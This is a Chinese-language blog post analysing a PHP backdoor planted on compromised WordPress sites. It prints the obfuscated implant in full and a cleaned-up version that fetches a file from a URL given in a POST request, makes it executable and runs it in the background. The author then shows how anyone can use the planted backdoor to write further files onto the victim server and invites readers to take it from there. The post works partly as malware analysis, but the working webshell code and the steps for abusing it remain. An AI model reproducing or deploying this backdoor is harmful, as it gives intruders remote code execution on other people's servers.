Friday, August 9, 2019

超过35000个WordPress站被攻破事件分析


🐎


1
<?php goto D242; Cfc5: echo "\x61\x75\x78\x36\x54\150\x65\151\157\x47\150\165\x65\x51\x75\63"; goto e83e; f7cc: B487: goto d892; Ff02: chmod($C43e, 0755); goto b30d; e9df: if (empty($B113)) { goto B487; } goto a0b1; B80e: echo "\157\153"; goto f7cc; c76b: if (!($_POST["\143\x70"] == "\144\157\167\x6e\x6c\157\x61\x64")) { goto Ee85; } goto A93f; bdbb: exec("\x70\153\151\x6c\154\40\x2d\71\x20\55\x66\x20\163\x74\x65\141\x6c\x74\150"); goto c200; F9c6: $B113 = $_POST["\x75\162\x6c"]; goto e9df; b30d: $Ab43 = "\56\x2f{$C43e}\x20\76\40\57\144\x65\166\x2f\x6e\x75\154\x6c\x20\62\76\x2f\144\145\x76\x2f\x6e\x75\154\x6c\40\x26"; goto D4a3; e83e: die; goto D223; d875: if (!($_GET["\x63\147"] == "\143\x68\x6b")) { goto F9f0; } goto Cfc5; D223: F9f0: goto c76b; A93f: $C43e = substr(str_shuffle(str_repeat($bf09 = "\60\61\62\x33\x34\65\x36\67\x38\x39\141\x62\143\x64\x65\x66\147\x68\x69\152\153\x6c\x6d\x6e\x6f\x70\161\162\163\164\x75\166\x77\x78\x79\x7a\x41\102\x43\x44\105\x46\107\x48\x49\112\113\x4c\x4d\116\117\120\121\122\123\x54\125\126\127\x58\131\132", ceil(6 / strlen($bf09)))), 1, 6); goto F9c6; F064: $b3e4 = file_get_contents(trim($B113)); goto a92a; D4a3: exec($Ab43); goto B80e; a92a: file_put_contents($C43e, $b3e4); goto Ff02; a0b1: @unlink($C43e); goto bdbb; c200: exec("\160\x6b\x69\154\154\40\x2d\146\x20\x2d\71\40\x73\164\145\141\154\x74\150"); goto F064; D242: error_reporting(0); goto d875; d892: Ee85:

分析后


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
error_reporting(0);
if ($_GET["cg"] == "chk") {
 echo "aux6TheioGhueQu3";
} else if ($_POST["cp"] == "download") {
 $cqQHbAE5XLgs8psC = substr(str_shuffle(str_repeat($ZNPTFf3D_3zXFaNZ = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", ceil(6 / strlen($ZNPTFf3D_3zXFaNZ)))), 1, 6);
 if (!empty($_POST["url"])) {
  @unlink($cqQHbAE5XLgs8psC);
  exec("pkill -9 -f stealth");
  exec("pkill -f -9 stealth");
  $zoUdl1u2MM35rLMf = file_get_contents(trim($_POST["url"]));
  file_put_contents($cqQHbAE5XLgs8psC, $zoUdl1u2MM35rLMf);
  chmod($cqQHbAE5XLgs8psC, 0755);
  $h2mklze53I9MDH0c = "./{$cqQHbAE5XLgs8psC} > /dev/null 2>/dev/null &";
  exec($h2mklze53I9MDH0c);
  echo "ok";
 }
}
?>
我想说对那个挂🐎的人说 你累不累啊你 反正我是很累
我感觉不是机器混淆的 是手工混淆 2个字 NB

分析

这程序很简单

0x01

GET 给一个 cg=chk
很明显是用来确认🐎是否存在的

测试

0x02

POST 给一个
cp=download
url=要下载的地址
首先会杀进程stealth
接下来就会把地址的内容下载下来命名为随机一个名字 给予执行权限并后台执行
最后没有错误的话会输出ok

测试

接下来的操作看自己发挥了
由于有写权限随便写个一句话不是问题
这里写一个phpinfo进去m.php
网页内容

1
2
#!/bin/bash
echo "<?php phpinfo() ?>" > m.php

后续

发现了一些那老哥传的🐎

个人猜测是挖矿的 体积也比较大 是二进制文件

0 comments:

Post a Comment